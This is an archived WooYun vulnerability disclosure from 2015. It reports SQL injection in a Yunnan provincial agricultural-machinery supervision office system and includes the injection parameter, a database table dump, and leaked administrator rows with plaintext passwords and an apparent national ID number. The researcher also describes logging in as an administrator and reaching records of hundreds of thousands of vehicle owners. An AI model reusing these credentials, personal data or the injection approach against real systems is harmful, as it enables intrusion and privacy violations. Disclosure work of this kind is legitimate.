当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143720

漏洞标题:某省级机构网上办公系统漏洞泄漏上百万信息

相关厂商:cncert国家互联网应急中心

漏洞作者: wsg00d

提交时间:2015-10-06 21:40

修复时间:2015-11-26 10:50

公开时间:2015-11-26 10:50

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

某省级机构网上办公系统sql注入泄漏大量信息,人员信息,牌证信息,考试试题。。。
中秋快乐,审核同学辛苦了,求首页,用rank砸死我,让我升级摆脱实习吧,么么哒

详细说明:

云南省农机安全监理网络办公系统
**.**.**.**/

111111111111111111111111111847.png


注入点:

**.**.**.**/wxgl/wangdian/main.php?col=%5c&dqid=1011&keyword=1&sumit=


oracle的数据库,数据很多哇

1111111111111111111111115908.png


所有数据库,当前数据库为JYNJ

available databases [4]:
[*] JYNJ
[*] SYS
[*] SYSTEM
[*] WMSYS


JYNJ数据库里有将近300个的表

Database: JYNJ
[283 tables]
+-----------------+
| ADMIN_LOG       |
| BBS             |
| BDSJB           |
| B_RECEIVE       |
| B_SEND          |
| CAIWU           |
| CPXHB           |
| CPXHB_XGJLB     |
| CWTJ            |
| CYSJB           |
| DEMOB           |
| DQJGB           |
| EXAM_KJB        |
| EXAM_SJB        |
| EXAM_SJ_CLASS   |
| EXAM_STB        |
| EXAM_ST_IMPORT  |
| EXAM_TEST_KJB   |
| EXAM_TEST_USER  |
| EXAM_TKB        |
| EXAM_USER       |
| GA_DEF_SGRDYY   |
| GA_DEF_WFXW     |
| GA_DEF_WFXW2014 |
| GA_DXB          |
| GA_SGXX         |
| GA_WFB          |
| GA_WFB_WS       |
| GWB             |
| HPK             |
| HZ1             |
| HZS_BB          |
| HZS_JSRB        |
| HZS_NJB         |
| HZS_NJ_RECORD   |
| HZS_ZB          |
| HZS_ZB2         |
| JGRR            |
| JGRR_DETAIL     |
| JHD0            |
| JHD0_DJZS       |
| JHD0_HGBZ       |
| JHD0_SDJY       |
| JHD1            |
| JJGL            |
| JJGLYB          |
| JJGLYB_DETAIL   |
| JJJSR           |
| JLY_NSB         |
| JSRGL           |
| JSZB            |
| JSZB_DETAIL     |
| LCB             |
| LSSG            |
| LWSG            |
| MEMBER          |
| MQZX            |
| MQZX1           |
| MYTEST          |
| NJSG1           |
| NJSG2           |
| NJ_PC_DATA      |
| NLCB            |
| NNJJSY_BLB      |
| NNJJSY_CJB      |
| NNJJSY_CLB      |
| NNJJSY_DJGZB    |
| NNJJSY_HFJSZ    |
| NNJJSY_HZB      |
| NNJJSY_JZHXZB   |
| NNJJSY_LSZLK    |
| NNJJSY_TJB      |
| NNJJSY_ZJB      |
| NNJJSY_ZKZMB    |
| NNJJSY_ZRZCB    |
| NNJJSY_ZXB      |
| NNJ_BGB         |
| NNJ_BGBAB       |
| NNJ_BHLB        |
| NNJ_DJGZB       |
| NNJ_DYB         |
| NNJ_GSB         |
| NNJ_HGBZB_1010  |
| NNJ_HGBZB_1011  |
| NNJ_HGBZB_1012  |
| NNJ_HGBZB_1013  |
| NNJ_HGBZB_1014  |
| NNJ_HGBZB_1015  |
| NNJ_HGBZB_1016  |
| NNJ_HGBZB_1017  |
| NNJ_HGBZB_1018  |
| NNJ_HGBZB_1019  |
| NNJ_HGBZB_1020  |
| NNJ_HGBZB_1021  |
| NNJ_HGBZB_1022  |
| NNJ_HGBZB_1023  |
| NNJ_HGBZB_1024  |
| NNJ_HGBZB_1025  |
| NNJ_HGBZB_1026  |
| NNJ_HGBZB_1027  |
| NNJ_HGBZB_1028  |
| NNJ_HGBZB_1029  |
| NNJ_HGBZB_1030  |
| NNJ_HGBZB_1031  |
| NNJ_HGBZB_1032  |
| NNJ_HGBZB_1033  |
| NNJ_JYKB        |
| NNJ_LSHPB       |
| NNJ_LSZLK       |
| NNJ_WTJYB       |
| NNJ_XGJLB       |
| NNJ_ZCDJB       |
| NNJ_ZHPK        |
| NNJ_ZXB         |
| NNJ_ZXK         |
| NNJ_ZYDJB       |
| NTLJJSY_BLB     |
| NTLJJSY_CJB     |
| NTLJJSY_CLB     |
| NTLJJSY_DJGZB   |
| NTLJJSY_HFJSZ   |
| NTLJJSY_HZB     |
| NTLJJSY_JSZK    |
| NTLJJSY_LSZLK   |
| NTLJJSY_TJB     |
| NTLJJSY_WFJFB   |
| NTLJJSY_XGJLB   |
| NTLJJSY_ZJB     |
| NTLJJSY_ZKZMB   |
| NTLJJSY_ZRZCB   |
| NTLJJSY_ZXB     |
| NTLJJSY_ZXK     |
| NTLJ_BGB        |
| NTLJ_BGBAB      |
| NTLJ_BHLB       |
| NTLJ_DJGZB      |
| NTLJ_DYB        |
| NTLJ_GSB        |
| NTLJ_HGBZB_1010 |
| NTLJ_HGBZB_1011 |
| NTLJ_HGBZB_1012 |
| NTLJ_HGBZB_1013 |
| NTLJ_HGBZB_1014 |
| NTLJ_HGBZB_1015 |
| NTLJ_HGBZB_1016 |
| NTLJ_HGBZB_1017 |
| NTLJ_HGBZB_1018 |
| NTLJ_HGBZB_1019 |
| NTLJ_HGBZB_1020 |
| NTLJ_HGBZB_1021 |
| NTLJ_HGBZB_1022 |
| NTLJ_HGBZB_1023 |
| NTLJ_HGBZB_1024 |
| NTLJ_HGBZB_1025 |
| NTLJ_HGBZB_1026 |
| NTLJ_HGBZB_1027 |
| NTLJ_HGBZB_1028 |
| NTLJ_HGBZB_1029 |
| NTLJ_HGBZB_1030 |
| NTLJ_HGBZB_1031 |
| NTLJ_HGBZB_1032 |
| NTLJ_HGBZB_1033 |
| NTLJ_JSZ_LSHB   |
| NTLJ_JYKB       |
| NTLJ_LSHPB      |
| NTLJ_LSZLK      |
| NTLJ_WTJYB      |
| NTLJ_XGJLB      |
| NTLJ_ZCDJB      |
| NTLJ_ZHPK       |
| NTLJ_ZXB        |
| NTLJ_ZXK        |
| NTLJ_ZYDJB      |
| PAT_TWB         |
| PAT_ZB          |
| PC_ALL          |
| PC_DATA         |
| PC_T            |
| PRINT_COUNT     |
| PX_JGB          |
| PX_RECORD       |
| PZ_COUNT        |
| QXB             |
| QYZLK           |
| RWD             |
| SDJY_BADJB      |
| SDJY_BGB        |
| SDJY_BHLB       |
| SDJY_CPXHB      |
| SDJY_DJGZB      |
| SDJY_HGBZB_1010 |
| SDJY_HGBZB_1011 |
| SDJY_HGBZB_1012 |
| SDJY_HGBZB_1013 |
| SDJY_HGBZB_1014 |
| SDJY_HGBZB_1015 |
| SDJY_HGBZB_1016 |
| SDJY_HGBZB_1017 |
| SDJY_HGBZB_1018 |
| SDJY_HGBZB_1019 |
| SDJY_HGBZB_1020 |
| SDJY_HGBZB_1021 |
| SDJY_HGBZB_1022 |
| SDJY_HGBZB_1023 |
| SDJY_HGBZB_1024 |
| SDJY_HGBZB_1025 |
| SDJY_HGBZB_1026 |
| SDJY_HPHM_LSHB  |
| SDJY_NLCB       |
| SDJY_XGJLB      |
| SDJY_ZHPK       |
| SDJY_ZXB        |
| SDJY_ZXK        |
| SDJY_ZYDJB      |
| SGJJSRPZ        |
| SGJJSRPZ_DETAIL |
| SGJPZDZ         |
| SGJPZDZ_DETAIL  |
| SG_DCBGS        |
| SG_DJB          |
| SG_DSRCSCL      |
| SG_DYWPQD       |
| SG_FHJL         |
| SG_JYWTS        |
| SG_KCBL         |
| SG_KCZP         |
| SG_KYJDS        |
| SG_LSHB         |
| SG_QJF          |
| SG_RDS          |
| SG_SGXX         |
| SG_STCL         |
| SG_TJSQS        |
| SG_TJZJS        |
| SG_WTS          |
| SG_XCT          |
| SG_XWBL         |
| SG_ZJDJBCQD     |
| TABLE_DLSGYBB3  |
| TABLE_JCQKB4    |
| TABLE_JLRYHZB7  |
| TABLE_JSRDJB6   |
| TABLE_JSZBHZB8  |
| TABLE_JXSGYB2   |
| TABLE_XCJY      |
| TABLE_YBB       |
| TABLE_ZLQKTJB5  |
| TEST            |
| TJ_JSYB         |
| TJ_JSZBB        |
| TJ_NJSGQKB      |
| TJ_NJSGYBB      |
| TJ_NYJXB        |
| TJ_RYQKB        |
| TJ_XSGB         |
| TLJJSRPZ        |
| TLJJSRPZ_DETAIL |
| TLJPZDZ         |
| TLJPZDZ_DETAIL  |
| USERT           |
| WFJF_EXAM       |
| WX_BGB          |
| WX_CSB          |
| WX_HZB          |
| WX_LSB          |
| WX_MQZX         |
| WX_NBB          |
| WX_NLCB         |
| WX_USER         |
| WX_XGJLB        |
| WX_YHYWFWB      |
| WX_ZB           |
| WZLCB           |
| WZZZDW          |
| YHB             |
| YHB_XGJLB       |
| YHYWFWB         |
| YH_YWJLB        |
| YWZZK           |
| ZJGL_DFB        |
| ZJGL_JKB        |
| ZJGL_XGJL       |
| NTLJJSY_HFJSZ   |
+-----------------+


部分信息

3333333333333333333337120334.png


444444444444444444420448.png


漏洞证明:

找到几个系统管理员的帐号,

select * from JYNJ.USERT [5]:
[*] 1,  ,  ,  , 2, 28,  ,  ,  ,  ,  , a123456,  ,  , 10, mojian,  ,  ,  ,  
[*] 1,  ,  , 1986-11-24 00:00:00, 1, 29,  ,  ,  , 汉族, mojian, a123456, 7, 321084198611240038, 10, mojian, 1, 本科, G, 0
[*] 0,  ,  ,  , 2, 30,  ,  ,  ,  ,  , 123456,  ,  , 102710, dzxqan,  ,  ,  ,  
[*] 0,  ,  ,  , 2, 31,  ,  ,  ,  ,  , 123456,  ,  , 102710, 50124447,  ,  ,  ,  
[*] 1,  ,  ,  , 2, 32,  ,  ,  ,  ,  , 123456,  ,  , 10, 123456,  ,  ,  ,


使用帐号mojian和密码a123456成功登录系统

555555555555555555555520810.png


大量各种信息啊,这个帐号还是系统管理员

QQ图片20150927121034.jpg


考试系统管理,大量试题以及考生信息

66666666666666666666666621350.png


队伍管理,1000个办公人员详细信息泄漏

777777777777777777777121647.png


8888888888888888888888888937.png


9999999999999999999999110.png


等等。。
还有其它很多东西,退出,重新使用mojian这个帐号登录公安交管,

bbbbbbbbbbbbbbbbbbbbbb40.png


33万的拖拉机主信息,住址姓名车牌

cccccccccccccccccccccccccccccc2909.png


这边又是40万的信息

dddddddddddddddddddddddddddd2.png


zzzzzzzzzzzzzzzzzzzzzzzz23624.png


同样也可以使用mojian登录其它分支

修复方案:

其它一些小问题,php探针。,。
**.**.**.**/php.php

版权声明:转载请注明来源 wsg00d@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 10:49

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2015-10-07 11:40 | wsg00d ( 普通白帽子 | Rank:162 漏洞数:18 | 人丑就要多读书)

    额,这算的是大厂商还是小厂商啊,这么多信息,求大厂商啊,@疯狗 @浩天